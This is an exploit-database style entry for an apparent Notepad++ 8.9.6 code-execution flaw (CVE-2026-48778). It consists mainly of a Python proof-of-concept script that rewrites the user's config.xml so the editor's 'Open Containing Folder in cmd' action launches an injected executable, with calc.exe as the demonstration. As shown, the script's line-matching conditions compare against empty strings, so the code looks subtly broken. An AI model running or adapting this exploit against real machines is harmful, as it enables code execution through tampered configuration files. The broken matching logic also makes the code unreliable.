# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution # Date: 2026-05-30 # Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/ # Vendor Homepage: https://notepad-plus-plus.org # Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/ # Version: <= 8.9.6 # Tested on: Windows 10/11 # CVE: CVE-2026-48778 # Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9 # # Description: # Notepad++ reads from config.xml without # validation and passes it to ShellExecute when "Open Containing Folder in cmd" is # triggered. An attacker with write access to %APPDATA%\Notepad++\ can inject an # arbitrary executable path, resulting in code execution under the current user context. # In the following script, `calc.exe` has been used to demonstrate this vulnerability. import os, sys appdata = os.environ["APPDATA"] if not appdata: print("[!] APPDATA environment variable not found, exiting..") sys.exit() config_path = os.path.join(appdata, "Notepad++", "config.xml") existing = os.path.exists(config_path) if existing==True: print("[+] Found config.xml at ", config_path) else: print("config.xml not found. Ensure Notepad++ is installed and has been launched atleast once.") x = open(config_path, 'r') s = x.readlines() payload='calc.exe\n' injected=False for num,i in enumerate(s, start=0): if '' in i: print("[!] Injecting payload..") s[num]=payload injected=True break elif "" in i: print("[!] Injecting payload..") s.insert(num, payload) injected=True break if not injected: print("[!] Payload injection failed.") sys.exit(1) y = open(config_path, 'w') y.writelines(s) print("[+] Payload injected successfully!") print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd") print("[+] Calc.exe will launch instead of cmd.") print("end")